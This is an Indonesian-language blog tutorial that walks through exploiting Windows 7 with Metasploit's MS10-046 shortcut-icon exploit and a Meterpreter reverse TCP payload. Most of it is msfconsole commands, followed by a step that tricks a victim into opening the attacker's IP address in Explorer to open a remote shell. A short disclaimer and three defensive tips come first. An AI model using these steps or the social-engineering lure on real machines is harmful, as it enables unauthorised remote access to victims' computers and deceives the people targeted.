EXPLOIT WINDOWS 7 DENGAN METASPLOIT (KALI LINUX)

Hai sob ...
Kali ini saya berbagi tentang ilmu hacking windows 7 , tapi sebaiknya tutorial ini tidak digunakan untuk kejahatan , INGAT!! , Nah untuk mengatasi exploit ini windows 7 harus :

1. Menggunakan Antivirus

2. Firewall selalu ON
3. Jangan mau kalau di suruh buka link yang tidak jelas

Oke kita lanjut ke tutorialnya :


1. Buka Metasploitnya dengan perintah :

daywalker@Lo0b4ack:~# msfconsole



2. Masuk ke exploit/windows/browser/ms10_046_shortcut_icon_dllloader
msf > use exploit/windows/browser/ms10_046_shortcut_icon_dllloader


3. Setting payloadnya
msf exploit(ms10_046_shortcut_icon_dllloader) > set payload windows/meterpreter/reverse_tcp



4. Tambahkan SVRHOST 192.168.56.1 Dan LHOST 192.168.56.1
*Penjelasan : 192.168.56.1 >> Diisi dengan ip address anda


5. Jalankan Exploitnya :
msf exploit(ms10_046_shortcut_icon_dllloader) > exploit



6. Nah sekarang saya socengkan korban dan suruh buka ip address saya di windows exploler , Karna saya ini hanya mencoba , jadi saya menggunakan virtual
7. Tunggu sampai bacaan  ini baru [*]Materpreater Session 1 opened (bla bla bla) , percis seperti ini yang paling bawah , Kalau muncul berarti tekan CTRL+C:

8. Sekarang kita eksekusi :D , Masukan perintah :
msf exploit(ms10_046_shortcut_icon_dllloader) > sessions -i 1

Itu secara default sudah masuk di C:\Windows\system32



Share this

Related Posts

Previous
Next Post »